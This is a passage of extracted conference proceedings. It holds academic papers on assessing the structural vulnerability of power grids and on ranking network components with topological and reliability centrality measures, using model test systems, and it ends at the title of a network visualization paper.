3 Global Network Performance In this section, according to the obstacles we have discussed, we will propose solutions from knowledge of electrical power engineering to define a global network performance of power grids. 3.1 Length and Contribution of Paths To overcome the unrealistic assumption that only considers the shortest path between a generation node g and a load node d, we resort to PTDF to measure the contribution of all involved paths. If the reference node for PTDF in (1) is j, the columns corresponding to node g and node d can be written as A.g ( j) and A.d ( j). Then the distribution factors corresponding to node g with reference to node d can be calculated as: A.g (d) = A.g ( j) − A.d ( j)
(2)
A.g (d) can reflect the distribution factors of each edge corresponding to power transmission from node g to node d. The item alg (d) is just the distribution factor of edge l. In this way, the power distribution factors between any pair of node can be directly calculated from (1). We will drop the reference node d in following formulas for simplicity. After getting distribution factors of all edges, we need to identify all valid paths involved in power transmission from g to d and calculate the distribution factors for each path. The procedure can be generally explained as the following steps. 1. Starting from the source node g, follow an output path p according to the direction of PTDF. 2. When path p arrives a new node i and if i is not node d, then partition path p into multiple new paths according to the output edges of i and recalculate the PTDF for each of them. 3. Continue to follow one of the new paths and repeat step 2 until the current path arrives d. 4. Repeat to follow all possible paths until they arrive d.
148
E. Bompard et al.
In step 2, the recalculation of PTDF should consider three different cases shown in Fig. 1. Since path is a different concept from edge, multiple paths can go through the same edge, we indicate paths by dashed lines and edges by real lines. For case (a), no matter how many input paths, since there is only one output edge of node i, the PTDF of path p still keep unchanged. For case (b), since there is only one input path p, it would be partitioned as multiple new paths corresponding to the multiple output edges. Therefore, the PTDF for each new path is just equal to the PTDF of the corresponding output edge. For case (c) where we have multiple input paths with multiple output edges, the problem becomes a little complex. Each input path p can be partitioned as multiple new paths corresponding to the output edges. However, for each output edge, all the input paths may contribute to the power flow in this edge. It is difficult to identify how much power flow from each input path to each output edge. Therefore, here we make a linear assumption that the assignment of power flow from one input path to all output edges is proportional to the PTDF of these lines, or we can say the contributions from all input paths to one output edge are proportional to the PTDF of all these input paths. This policy can be generally extended to the former cases (a) and (b).
Fig. 1. Different cases for recalculation of PTDF for paths
In summary of all three cases, if node i has U output edges (l1 , l2 , . . . , lU ), each input path p with PTDF f p would be partitioned as U new paths. The PTDF f pk of the new path from p through edge lk (k = 1 · · ·U) can be calculated as: al g f pk = f p U k (3) ∑s=1 als g Assume that Pgd is the set of all valid paths from g to d, we can get all PTDF f p for each of path p in Pgd . f p can be considered as a weight indicating how much path p contributes to the power transmission from g to d. Moreover, the length d(p) of path p should be the sum of the impedance of each edge locates in this path. d(p) = ∑ Zl l∈p
(4)
Assessment of Structural Vulnerability for Power Grids
149
3.2 Capacity of Each Path To reflect the heterogeneity for lines in power flow capacity, we define the generator bus g together all the involved paths Pgd from it to the distribution bus d as an efficient power supply scheme h(g, d) for power consuming on d. Then the capacity of scheme h can be defined in the following way: the injection from g is increased from zero to Mh when the first line among all involved paths reaches its maximum power flow limit. l P Mh = min max (5) l∈L |alg | Then the capacity for each involved path p can be calculated as: M p = f p • Mh
(6)
3.3 Global Network Performance To indicate the power supply ability of the whole network, here we propose a concept of global network performance of a power grid to make general and statistic evaluation of the network. The definition of global network performance for power grids is based on the global efficiency in general theory of CN [17]. The definition of power grid global network performance should satisfy the following three policies: 1. With equal length, more capacity of power supply means better performance. 2. With equal capacity of power supply, shorter length means better performance. 3. Only power transmission from generation buses to distribution buses should be considered. Then we define the global network performance E(G) for a power grid G as: E(G) =
1 Ng Nd
∑ ∑ ∑
Mp
g∈Gg d∈Gd p∈Pgd
1 d(p)
(7)
3.4 Analysis of Vulnerability by Network Performance The basic idea for analysis of structural vulnerabilities of power grids by CN is to compare the network performance before and after the attacks or failures of some components. The relative drop of network performance is defined as:
Δ Er =
E(G) − E(G − li) E(G)
(8)
In reference [17], the vulnerability of an infrastructure system was defined as the maximum relative drop of network performance under a specific set of attacks or failures. This idea has been applied to analyze vulnerability in different works [7][8][14][15][16] where only the concrete methods to evaluate performance may be different. A shortcoming of this algorithm is the serious calculation burden when applying to large scale network, especially for the calculation of contributions of all involved paths.
150
E. Bompard et al.
However, the PTDF values of edges vary seriously. If we only consider the edges with PTDF values higher than a specific threshold (e.g. 0.05 which means 5 percent of total power flow), for a network with several hundreds of nodes, only very small part of paths taking most part of power flow need to be calculated. In this way, this method is possible to be applied to most normal high voltage transmission networks with several hundreds of buses.
4 Case Study We apply the definitions of global network performance above to a 34-bus system whose data are given in the appendix. As most research work of CN only consider one edge between two vertices, we combine the parallel lines between two buses as one line. According to the definition of vulnerability in [17], it depends on a specific set of damages. As transmission lines are easier to be attacked compared with substations which would be protected with more resources, here we only consider the attacks on transmission lines as indicative examples. However, this method is still valuable to apply to a larger set of damages including substations, similar to many other works have done to simulate removal of nodes. Due to the constraint of length for this paper, we only present the case about transmission lines. Then we apply the definition of global network performance and the definition of global efficiency in [8][9][15][17] to the model system to compare the relative drop of both caused by destroying each line li . The results are shown in figure 2 where the horizontal axis denotes the number of lines and vertical axis denotes the relative drops of global network performance and global efficiency caused by removal of each line. The values corresponding to (8) are shown by real line and the values of efficiency defined in former references mentioned above are shown by broken line.
Fig. 2. Comparison of relative drop of performance and efficiency
Assessment of Structural Vulnerability for Power Grids
151
Fig. 3. Total overload power flow caused by failure of each line Table 1. Distribution of Generations and Loads Bus NO. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
Generation (p.u.) 0 1.8 0 0 0 2.4 0 0 2 3.4 0 0 4 0 0 0 0
Capacities of generations & loads Load (p.u.) Bus NO. Generation (p.u.) 0 18 0 0 19 1.15 1 20 0 3.8 21 2.7 1.8 22 0 0 23 0 0 24 0 0 25 0 0 26 0 0 27 0 0 28 0 0 29 0 0 30 0 0 31 0 0 32 0 0 33 0 0 34 0
Load (p.u.) 0.9 0 1.75 0 0.6 0.6 0.5 0.5 0.5 0.5 0 0.9 0.95 0.9 1.05 0.6 0.6
According to figure 2, evaluated by generic concept of efficiency, there is no obvious critical line because the relative drop of efficiency is always less than 0.1 by attacking any line. However, evaluated by the global network performance defined in this paper,
152
E. Bompard et al. Table 2. Line data
Line NO. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
Start bus 1 1 1 1 1 1 1 2 2 3 3 3 3 4 4 4 4 5 5 6 6 7 7 8 9 30 30 30 32 32 32 32 34 33 24 26 27 28 19 19 21 21 21 18 18 22 29 31 34 24 28 19 18 23
End bus 2 3 4 4 8 10 10 4 11 4 5 12 12 15 7 13 13 15 14 15 15 8 16 17 14 29 29 29 30 30 31 31 33 32 25 25 26 27 20 20 20 20 22 21 21 23 12 14 9 16 6 17 11 13
Admittance (p.u.) 0.05062 0.05785 0.05785 0.08161 0.12934 0.00413 0.00413 0.05062 0.00413 0.13843 0.20041 0.00413 0.00413 0.05114 0.06818 0.00413 0.00413 0.0657 0.00413 0.00413 0.00413 0.06674 0.00413 0.00413 0.08161 0.04756 0.04756 0.04756 0.04756 0.04756 0.04756 0.04756 0.092 0.092 0.04756 0.04756 0.04756 0.04756 0.04756 0.04756 0.04756 0.04756 0.092 0.04756 0.04756 0.092 0.01033 0.01033 0.02066 0.02066 0.02066 0.01033 0.01033 0.04132
Pimax (p.u.) 2.286 3.0 2.286 2.286 2.286 2.477 2.477 2.286 2.286 2.286 2.286 2.286 2.286 2.286 2.286 2.286 2.286 2.477 2.286 2.286 2.286 2.286 2.286 2.286 2.286 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 1.039 3.811 2.286 2.286 2.477 2.477 3.429 2.286 2.286
Assessment of Structural Vulnerability for Power Grids
153
it is obvious that the attack on the line of NO.13 (between bus 4 and bus 13) can cause very outstanding relative drop which is more than 0.5. That means the line of NO. 13 is the most critical line of the system whose failing would make the system suffer much more serious emergency than other lines. Then we can check if NO.13 is really more important to the network than other lines. To reasonably reflect the normal responds of the network under different load levels, we make the total load consumption in 24 hours consistent with the form of a real load curve from reference [17] and assign it to all load nodes proportionally to their mean values which are given in the appendix. Each line was deleted under different load levels and the total overload power of the whole system caused by it was calculated. The results of the simulation are given in figure 3. Although the different consumption of loads and output of generators make the power flow under various load levels different, it is obvious that attacking on the line of NO.13 can always cause serious overload which is extra higher compared with other lines and can threaten the system seriously. Therefore, it is undoubtedly that the line of NO.13 is the most critical line of the system which makes the system vulnerable for malicious attacks. However, if we consider this problem by the generic conception of efficiency, it is impossible to locate this weak point because the measurement doesnt reflect the real physical situation in power grids.
5 Conclusions In this paper, we have proposed several most important obstacles that would be specially considered when to apply methods or measurements from CN to power grids. The conception of global network performance specially defined based on proposed solutions of these obstacles has been applied to a model system. The results have proved that the adapted conception can take into account more useful information in analysis of power grids. Moreover, the security analysis based on the new definition of network performance has been proved to be more effective to locate critical component of the network and evaluate the vulnerability of the system.
Acknowledgements This work has been supported by the Next Generation Infrastructures Foundation.
References 1. Bompard, E., Gao, C., Masera, M., Napoli, R., Russo, A., Stefanini, A., Xue, F.: Approaches To The Security Analysis of Power Systems: Defence Strategies Against Malicious Threats, EUR 22683 EN, ISSN 1018-5593. Office for Official Publications of the European Communities, Luxembourg (2007) 2. Holmgren, J., Jenelius, E., Westin, J.: Evaluating Strategies for Defending Electric Power Networks Against Antagonistic Attacks. IEEE Trans. Power Systems 22 (February 2007) 3. Motto, A.L., Arroyo, J.M., Galiana, F.D.: A mixed-integer LP procedure for the analysis of electric grid security under disruptive threat. IEEE Trans. Power Systems 20(3), 1357–1365 (2005)
154
E. Bompard et al.
4. Albert, R., Albert, I., Nakarado, G.L.: Structural vulnerability of the North American power grid. Physical Review E 69, 025103(R) (2004) 5. Watts, D.J., Strogatz, S.H.: Collective dynamics of small-world networks. Nature 393(6684), 440–442 (1998) 6. Barabsi, A.-L., Albert, R.: Emergence of scaling in random networks. Science 286, 509–512 (1997) 7. Rosas-Casals, M., Valverde, S., Sole, R.V.: Topological Vulnerability of the European Power Grid Under Errors and Attacks. International Journal of Bifurcation and Chaos 17(7), 2465– 2475 (2007) 8. Crucitti, P., Latora, V., Marchiori, M.: Locating Critical Lines in High-Voltage Electrical Power Grids. Fluctuation and Noise Letters 5(2), L201–L208 (2005) 9. Rosato, V., Bologna, S., Tiriticco, F.: Topological properties of high-voltage electrical transmission networks. Electric Power Systems Research 77 (2007) 10. Chassin, D.P., Posse, C.: Evaluating North American electric grid reliability using the Barabasi-Albert network model. Physica A 355, 667–677 (2005) 11. Kinney, R., Crucitti, P., Albert, R., Latora, V.: Modeling Cascading Failures in the North American Power Grid. Eur. Phys. J. B 46, 101 (2005) 12. Crucitti, P., Latora, V., Marchiori, M.: A topological analysis of the Italian electric power grid. Physica A 338, 92–97 (2004) 13. Motter, A.E., Lai, Y.-C.: Cascade-based attacks on complex networks. Physical Review E 66, 065102(R) (2002) 14. Latora, V., Marchiori, M.: Efficient Behavior of Small-World Networks. Physical Review Letters 87(19) (November 5, 2001) 15. Latora, V., Marchiori, M.: How the science of complex networks can help developing strategies against terrorism. Chaos Solitons & Fractals 20, 69–75 (2004) 16. Albert, R., Jeong, H., Barabasi, A.-L.: Error and attack tolerance of complex networks. Nature 406 (July 27, 2000) 17. Latora, V., Marchiori, M.: Vulnerability and protection of infrastructure networks. Physical Review E 71, 015103(R) (2005) 18. Wang, C., Cui, Z., Chen, Q.: Short-term Load Forecasting Based on Fuzzy Neural Network. In: IEEE Workshop on Intelligent Information Technology Application, December 2-3, pp. 335–338 (2007)
Using Centrality Measures to Rank the Importance of the Components of a Complex Network Infrastructure Francesco Cadini, Enrico Zio, and Cristina-Andreea Petrescu Dipartimento di Energia - Politecnico di Milano, Via Ponzio 34/3, I-20133 Milan, Italy
Abstract. Modern society is witnessing a continuous growth in the complexity of the infrastructure networks which it relies upon. This raises significant concerns regarding safety, reliability and security. These concerns are not easily dealt with the classical risk assessment approaches. In this paper, the concept of centrality measures introduced in complexity science is used to identify the contribution of the elements of a network to the efficiency of its connection, accounting for the reliability of its elements. As an example of application, the centrality measures are computed for an electrical power transmission system of literature.
1
Introduction
An important issue for the protection of large-scale networks is that of determining the critical elements in the network. From a topological viewpoint, various measures of the importance of a network element (arc or node), i.e. of the relevance of its location in the network with respect to a given network performance, can be introduced. In social networks, for example, the so-called centrality measures are introduced as importance measures to qualify the role played by an element in the complex interaction and communication occurring in the network. The term ’importance’ is then intended to qualify the role that the presence and location of the element plays with respect to the average global and local properties of the whole network. Classical topological centrality measures are the degree centrality [1], [2], the closeness centrality [2], [3], [4], the betweenness centrality [2] and the information centrality [5]. They specifically rely only on topological information to qualify the importance of a network element. When looking at the safety, reliability and vulnerability characteristics of a physical network infrastructure, one should take into account the probability of occurrence of faults and malicious attacks in the various access points of the network. Then, the importance of an element is related also to these aspects, and not only to its topological location within the network. To this aim, local and global reliability centrality measures are here introduced by extension of the classical topological centrality measures. By considering the ’reliability distances’ among network nodes in terms of the probabilities of failure of the interconnecting links (or arcs, or edges), these measures give additional insights in the robustness of R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 155–167, 2009. c Springer-Verlag Berlin Heidelberg 2009
156
F. Cadini, E. Zio, and C.-A. Petrescu
the network systems, useful for their optimal design, operation and protection. The underlying idea in the qualification of the importance of the elements of a network is that an infrastructure is more ’safety-efficient’ when its elements are connected through more reliable paths. An application is illustrated with regards to the characterization of the importance of the nodes that constitute the transmission network system of the IEEE (Institute of Electrical and Electronic Engineers) 14 BUS (a portion of the American Electric Power System) [6]. This network has been chosen because it holds the relevant features of interconnected structures, while its simplicity allows explicitly proving the significance of the reliability centrality measures. The paper is organized as follows; in Section 2, the classical topological centrality measures are first reviewed and then their reliability extensions are introduced; in Section 3, a description of the transmission network is provided and the different topological and reliability centrality measures are compared and discussed; conclusions on the outcomes of the study are eventually drawn in Section 4.
2 2.1
Centrality Measures Topological Centrality Measures
The centrality measures are first presented from a purely topological point of view. To this aim, a generic network system is conveniently represented as a connected graph G(N, K) that has N (N − 1)/2 distinct shortest paths among the N nodes, each characterized by K incident edges. Each link is considered having a length equal to one and thus the distance between two nodes i and j is represented solely by the number of edges traveled in the path from i to j. The graph is described by the so-called adjacency matrix {aij }, an N × N matrix whose entry aij is 1 if there is an edge between i and j and 0 otherwise. The entries on the diagonal elements aii are undefined and for convenience are set equal to 0. The topological degree centrality, C D , gives the highest score of importance to the node with the largest number of first neighbors. This agrees with the intuitive way of estimating the influence of a node in a graph from the size of its immediate environment. Quantitatively, the topological degree centrality is defined as the degree of a node, normalized over the maximum number of neighbors this node could have; thus, in a network of N nodes, the topological degree centrality of node i, CiD , is defined as [1], [2]: aij ki j∈G D Ci = = , 0 ≤ CiD ≤ 1 (1) N −1 N −1 where ki is the degree of node i and N − 1 is the normalization factor introduced to account for the fact that a given node i can at most be adjacent to N − 1 other nodes.
Using Centrality Measures to Rank the Importance of the Components
157
The running time required for computing C D for all nodes is O(N ). The topological closeness centrality, C C , captures the idea of speed of communication between nodes in a way that the node which is ”closest” to all others receives the highest score. In other words, this measure allows to identify the nodes which on average need fewer steps to communicate with the other nodes, not only with the first neighbors. Because this measure is defined as ”closeness”, quantitatively the inverse of the node’s mean distance from all the others is used. If dij is the topological shortest path length between nodes i and j, i.e. the minimum number of edges traversed to get from i to j, the topological closeness centrality of node i is [2], [3], [4]: N −1 CiC = , 0 ≤ CiC ≤ 1 dij
(2)
j∈G
Note that also this measure is normalized to assume values in the interval [0, 1]. The running time required for computing C C for all nodes by means of the Floyd algorithm [7] is O(N 3 ). The topological betweenness centrality, C B , is based on the idea that a node is central if it lies between many other nodes, in the sense that is traversed by many of the shortest paths connecting pairs of nodes. The topological betweenness centrality of a given node i is quantitatively defined as [2]: 1 njk (i) CiB = , 0 ≤ CiB ≤ 1 (3) (N − 1)(N − 2) njk j,k∈G,j=k=i
where njk is the number of topological shortest paths between nodes j and k, and njk (i) is the number of topological shortest paths between nodes j and k which contain node i. Similarly to the other topological centrality measures, CiB assumes values between 0 and 1 and reaches its maximum when node i falls on all geodesics (paths of minimal length between two nodes). The running time required for computing C B for all nodes by means of the Floyd algorithm is O(N 3 ). The topological information centrality, C I , relates a node importance to the ability of the network to respond to the deactivation of the node. In this view, the network performance is measured by the network topological efficiency E[G] defined as [5]: 1 E[G] = εij (4) N (N − 1) i,j∈G,i=j
where εij = 1/dij is the efficiency of the connection between nodes i and j, measured as the inverse of the shortest path distance linking them. The topological information centrality of node i is defined as the relative drop in the network topological efficiency caused by the removal of the edges incident in i [5]: ΔE(i) E[G] − E[G (i)] CiI = = , 0 ≤ CiI ≤ 1 (5) E E[G]
158
F. Cadini, E. Zio, and C.-A. Petrescu
where G (i) is the graph with N nodes and K − ki edges obtained by removing from the original graph G the edges incident in node i. An advantage of using the efficiency to measure the performance of a graph is that E[G] is finite even for disconnected graphs. Also C I is normalized by definition in the interval [0, 1]. The running time required for computing C I for all nodes by means of the Floyd algorithm is O(N 4 ) [8]. 2.2
Reliability Centrality Measures
To include reliability-related information into the centrality measures, the formalism of weighted networks is undertaken [9]. In particular, the focus of the weight is on the reliability pij of the connection between pairs of nodes i and j [10]. On the basis of both {aij } and {pij } (or the complementary failure probability matrix {qij }), the matrix of the most reliable path lengths {rdij } can be computed [10]: ⎛ ⎞ ⎛ ⎞ ⎜ 1 rdij = min ⎜ ⎝ γij
pmn
⎟ ⎜ ⎟ = min ⎜ ⎠ γij ⎝
mn∈γij
1 (1 − qmn )
⎟ ⎟ ⎠
(6)
mn∈γij
where the minimization is done with respect to all paths γij linking nodes i and j and the product extends to all the edges of each of these paths. Note that 1 ≤ rdij ≤ ∞, the lower value corresponding to the existence of a perfectly reliable path connecting i and j (i.e. pmn = 1, qmn = 0, ∨ mn ∈ ij ) and the upper value corresponding to the situation of no paths connecting i and j (i.e. pmn = 0, qmn = 1). On the basis of this definition, it is possible to extend the previously defined centrality measures, so as to account for the reliability characteristics of the network arcs. The reliability degree centrality, RC D , of node i in a network of N nodes is defined as: ki pij RCiD =
j∈G
(N − 1)2
, 0 ≤ RCiD ≤ 1
(7)
where ki is the degree of node i and pij is the reliability of edge ij. Differently from (1), the normalization factor (N − 1)2 is introduced here to account for the fact that max(ki ) = N − 1 when the node i is fully connected and max pij = j∈G
N − 1 when all the N − 1 edges are fully reliable (pij = 1, ∨ j ∈ G). Thus, the measure RC D is normalized in the interval [0, 1]. The reliability closeness centrality, RC C , measures to which extent a node i is near to all other nodes along the most reliable paths and is defined in the same
Using Centrality Measures to Rank the Importance of the Components
159
way as its topological analog CiC (2), but with dij replaced by rdij (6). Also, RC C assumes values in the interval [0, 1]. The reliability betweenness centrality, RC B , is based on the idea that a node is central if it lies between many other nodes, in the sense that it is traversed by many of the most reliable paths connecting pairs of nodes; it is defined in the same way as its topological analog CiB (3), in which njk is replaced by rnjk (number of most reliable paths between nodes j and k) and njk (i) is replaced by rnjk (i) (number of most reliable paths between nodes j and k that contain node i). Also, this measure is normalized in the range [0, 1]. For the reliability information centrality, RC I , the network performance is measured by the reliability efficiency RE[G] of the graph G defined as: RE[G] =
1 N (N − 1)
rεij
(8)
i,j∈G,i=j
where rεij is the reliability efficiency between the two nodes i and j and is defined as its topological analog εij , but with dij replaced by rdij (6). Thus, the network is characterized also by the matrix {rεij } whose entries are the reliability efficiencies between pairs of nodes i and j. The reliability information centrality of node i, RCiI , is defined as its topological analog CiI (5), but with the network reliability efficiency RE[G] replacing the topological efficiency E[G]. RCiI is also normalized in the interval [0, 1]. The running times required for computing the above reliability centrality measures, RC D , RC C , RC B and RC I , are the same as those for the topological cases.
3
Application to a Power Transmission Network
The transmission network system IEEE 14 BUS [6] is taken as reference case study. The network is simple enough to allow the explicit illustration and interpretation of the reliability centrality measures introduced in Section 2.2, while at the same time it maintains the critical aspects related to interconnected structures. The network represents a portion of the American Electric Power System and consists of 14 bus locations connected by 20 lines and transformers as shown in Figure. 1. The transmission lines operate at two different voltage levels, 132 kV and 230 kV. The system working at 230 kV is represented in the upper half of Figure 1, with 230/132 kV tie stations at Buses 4, 5 and 7. Buses 1 and 2 are the generating units. The system is also provided with voltage corrective devices in correspondence of Buses 3, 6 and 8 (synchronous condensers). Each network component is transposed into a node or edge of the representative network and the topological and reliability centrality measures illustrated in Section 2 are computed in order to determine the relative importance of a node within the network.
160
F. Cadini, E. Zio, and C.-A. Petrescu Table 1. Failure rates for the arcs
From BUS To BUS Failure rate (occ/yr) Equipment 1
2
1.0858
132 kV transmission line
1
5
1.0858
132 kV transmission line
2
3
1.0858
132 kV transmission line
2
4
1.0858
132 kV transmission line
2
5
1.0858
132 kV transmission line
3
4
1.0858
132 kV transmission line
4
5
1.0858
132 kV transmission line
4
7
0.0105
132/230 kV transformer
4
9
0.0105
132/230 kV transformer
5
6
0.0105
132/230 kV transformer
6
11
0.5429
230 kV transmission line
6
12
0.5429
230 kV transmission line
6
13
0.5429
230 kV transmission line
7
8
0.0105
132/230 kV transformer
7
9
0.0105
132/230 kV transformer
9
10
0.5429
230 kV transmission line
9
14
0.5429
230 kV transmission line
10
11
0.5429
230 kV transmission line
12
13
0.5429
230 kV transmission line
13
14
0.5429
230 kV transmission line
The network visualizations have been done using the Pajek program for large network analysis [11]. Table 1 provides the power-dependent failure rates of the components (transmission lines and transformers) of the transmission network, as inferred from literature data [12] under the simplifying assumption of an equal length of 100 km for all the network lines. The reliability of edge ij is defined as: pij = e−λij T
(9)
where λij is the failure rate of edge ij linking nodes i and j and T is a reference time here chosen equal to 1 year. It is then possible to compute the most reliable path lengths {rdij } and thus the reliability measures of centrality. Table 2 lists all the 14 network nodes ranked according to the four topological centrality measures (columns two, four, six and eight) and to the four reliability centrality
Using Centrality Measures to Rank the Importance of the Components
161
Fig. 1. Transmission network [6]
Fig. 2. The IEEE 14 BUS transmission network’s graph representation
measures (columns three, five, seven and nine). Figures 3 to 6 show the values of the four centrality measures considered (degree, closeness, betweenness and information, respectively) both from the topological and the reliability points of view.
162
F. Cadini, E. Zio, and C.-A. Petrescu Table 2. Topological and Reliability Centrality Measures Rank C D
RC D
CC
RC C C B
RC B
C I RC I
1
4
4
4
4
4
6
4
7
2
2,5,6,9
9
5,9
9
5,9
9
7
9
13,14
9
4
6
6
5
5
2
13
3
6
4
7
6
7
6
5
5
2
6
7
2
7
14
14
7
13
14
10,13 2
8
1,3,10,11,12,14 10,11,12,14 10,13
6
7,13
5
9
10
4
13 14
2,7
14 10 10 11
10
11
2
11
11
3
8
1,3,8,12 1,3,8,12 3
1
12
1
12
3
12 3
8
1
8
12
1,3
13 14
3.1
13 11
10,11
8
8
5
11 8 12 2
1
Degree Centrality Measures (C D and RC D )
The ranks and the values of the degree centrality measures from both topological and reliability points of view, are presented in columns 2 and 3 of Table 2 and in Figure 3. As defined by (1) and (7), the most important nodes from a degree centrality point of view have the largest number of connections to other nodes in the network (topological case) and also the most reliable ones (reliability case). Thus, node 4, characterized by the largest number of incident edges (five) is correctly placed in the first position in the topological rank and it maintains it also when the arc reliabilities are taken into account. On the contrary, nodes 2 and 5 (four incident edges), in second position from a topological point of view, drop to the sixth and fifth positions of the reliability ranking, respectively, due to the fact that some of their connections are characterized by the highest values of the failure rates (1.0858 occ/yr) which provide low contributions to the numerator of (7). Interestingly, node 7, with only three connections, gains the fourth position in the reliability rank due to their lowest values of failure rates (0.0105 occ/yr). 3.2
Closeness Centrality Measures (C C and RC C )
The ranks and the values of the closeness centrality measures from both topological and reliability points of view, are presented in columns 4 and 5 of Table 2 and in Figure 4.
Using Centrality Measures to Rank the Importance of the Components
163
Fig. 3. Topological and Reliability Degree Centrality, C D and RC D
Fig. 4. Topological and Reliability Closeness Centrality, C C and RC C
Node 4 results again the most important, both from the topological and reliability points of view, because the shortest topological and reliability paths connecting it to all the other nodes are, on average, shorter than those starting from any other node (2). Also, in general, the topological and reliability ranks do not present significant differences, except for node 2 which, despite the four incident edges, drops from the fifth to the tenth position. This is mainly due to the fact that it belongs to the lower reliable subgraph of the network (connections between nodes 1, 2, 3, 4 and 5) with no direct edges connecting it to the most reliable subgraph (as for example nodes 4 and 5); thus, the reliability shortest
164
F. Cadini, E. Zio, and C.-A. Petrescu
paths connecting node 2 to all the other nodes are either characterized by large values of the failure rates, or are the results of more tortuous paths involving several edges: in both cases, the distances rd2j contribute little to a relatively low value of RC C . In this regard, note that also nodes 1 and 3, which belong to the same subgraph of node 2 but with even less incident edges, occupy the last two positions in the reliability ranking. 3.3
Betweenness Centrality Measures (C B and RC B )
The ranks and the values of the betweenness centrality measures from both topological and reliability points of view, are presented in columns 6 and 7 of Table 2 and in Figure 5. As defined by (3), betweenness centrality assigns more importance to a node if it lies on a larger number of shortest paths connecting pairs of nodes, both from the topological and the reliability points of view. In the topological rank, node 4 is again the most important since it bridges the lower and upper parts of the graph, similarly to nodes 5, 6 and 9, which in fact appear in the successive first three positions. These nodes ”naturally” constitute a shortcut between the two regions of the network and are thus involved in the majority of all shortest paths between two generic nodes i and j. When the reliability of the connections is taken into account, nodes 4 and 5 plummet to the seventh and tenth positions, respectively, whereas nodes 6 and 9 occupy the first and second positions: this is due to the fact that the nodes 4 and 5 (6 and 9) are located in the least (most) reliable subgraphs, thus probably belonging on average to low (high) reliability geodesic paths.
Fig. 5. Topological and Reliability Betweenness Centrality, C B and RC B
Using Centrality Measures to Rank the Importance of the Components
3.4
165
Information Centrality Measures (C I and RC I )
The ranks and the values of the information centrality measures from both topological and reliability points of view, are presented in columns 8 and 9 of Table 2 and in Figure 6. Node 4 is the most important from a topological point of view which means that its removal yields the largest drop in the network efficiency (see (5)). As already highlighted for C B and RC B , node 4, similarly to nodes 5, 6 and 9, bridges two otherwise separated regions of the network. The removal of such nodes yields a large increase in the average shortest path lengths, thus sensibly affecting the network efficiency. When the reliability of the connections is taken into account, then node 4 drops to the third position, due to the fact that three out of five connections are characterized by very large failure rates (λ4j = 1.0858 occ/yr, j = 2, 3, 5): this implies that the shortest paths starting from it and connecting the remaining nodes are likely to be strongly influenced at least from these first unreliable edges and, consequently, so is the global efficiency. On the contrary, nodes 7 and 9 are characterized by very low connections’ failure rates and are thus, for the opposite reasons, in the first and second positions respectively in the reliability rank. Notice that node 7 ranks second in the topological analysis, although only three edges depart from it, because its removal implies also the removal of node 8 and of all the shortest paths in the dij matrix originating from it. Another interesting case is that of node 8, which is the least important from a topological point of view and, despite its single incident edge, gains the tenth position in the reliability information centrality rank, due to the fact that its connection is a highly reliable one (λ87 = 1.0858 occ/yr).
Fig. 6. Topological and Reliability Information Centrality, C I and RC I
Summarizing, node 4 is the most important for almost all centrality measures, except for the reliability information centrality, due to its three low reliable
166
F. Cadini, E. Zio, and C.-A. Petrescu
connections, and for the reliability betweenness centrality, due to the fact that it bridges the two parts of the network characterized by different reliabilities while belonging to the less reliable subgraph. Node 9 is instead solidly in the second position of all ranks (except for the third position in the topological information centrality) and it does not suffer from the same problem of node 4, being part of the highly reliable subgraph. It is worth noticing that node 7, despite its peripherical position and its intermediate rank in three centrality measures, gains the second and first positions in the topological and reliability information centrality ranks, respectively, due to its high reliable edges and to the fact that it connects to the rest of the network the otherwise isolated node 8. Node 8 is always the last one, except for the reliability information centrality and reliability closeness centrality, which recognize its highly reliable edge. Thus, the analysis i)confirms the intuitive necessity to increase the protection of nodes 4, 5, 6 and 9 from malevolent attacks, since these nodes are responsible for connecting two different areas of the network and ii) suggests to take a similar action for node 7, which may not be so obvious. As a final remark, note that even in a simple network like the one under analysis, the new centrality measures accounting for the reliabilities leads to rankings of the nodes which have significant differences from the rankings obtained only on a purely topological analysis. In the case analyzed, the number of nodes whose rank changes by at least two positions is 3/14 (21%) for the degree centralities, 5/14 (36%) for the closeness centralities, 8/14 (57%) for the betweenness centralities and 6/14 (43%) for the information centralities.
4
Conclusions
In this paper, the topological concepts of centrality measures have been extended to account for the reliability of the network connections. The indications derived from the topological and the reliability centrality measures have been compared with respect to the importance of the nodes of the power transmission network system of the IEEE 14 BUS. Each equipment of the system has been transposed into a node or edge of the representative network and the topological and reliability centrality measures have been computed. The reliability measures have been shown capable of highlighting some network safety strengths and weaknesses otherwise not detectable on a pure topological basis. In this view, the reliability centrality measures may constitute a valuable additional tool for the network designers and managers to gain insights on the system robustness.
Acknowledgements This work has been partially funded by the Foundation pour une Culture de Securite Industrielle of Toulouse, France, under the research contract AO2006-01.
Using Centrality Measures to Rank the Importance of the Components
167
References 1. Nieminen, J.: On Centrality in a Graph. Scandinavian Journal of Psychology 15, 322–336 (1974) 2. Freeman, L.C.: Centrality in Social Networks: Conceptual Clarification. Social Networks 1, 215–239 (1979) 3. Sabidussi, G.: The Centrality Index of a Graph. Psychometrika 31, 581–603 (1966) 4. Wasserman, S., Faust, K.: Social Networks Analysis. Cambridge U.P., Cambridge (1994) 5. Latora, V., Marchiori, M.: A Measure of Centrality Based on the Network Efficiency. New Journal of Physics 9, 188 (2007) 6. The IEEE 14 BUS data can be found on, http://www.ee.washington.edu/research/pstca/ 7. Floyd, R.W.: Algorithm 97: shortest path. Communications of the ACM 5(6), 345 (1962) 8. Fortunato, S., Latora, V., Marchiori, M.: Method to find community structures based on information centrality. Physical Review E 70, 056104 (2004) 9. Latora, V., Marchiori, M.: Efficient Behavior of Small-World Networks. Physical Review Letters 87(19) (2001) 10. Zio, E.: From Complexity Science to Reliability Efficiency: A New Way of Looking at Complex Network Systems and Critical Infrastructures. Int. J. Critical Infrastructures 3(3/4), 488–508 (2007) 11. Pajek program for large network analysis, http://vlado.fmf.uni-lj.si/pub/networks/pajek/ 12. Billinton, R., Li, W.: Reliability Assessment of Electric Power Systems Using Monte Carlo Methods, pp. 19–20 (1994)
RadialNet: An Interactive Network Topology Visualization Tool with Visual Auditing Support Jo˜ao P.S. Medeiros1 and Selan R. dos Santos2 1
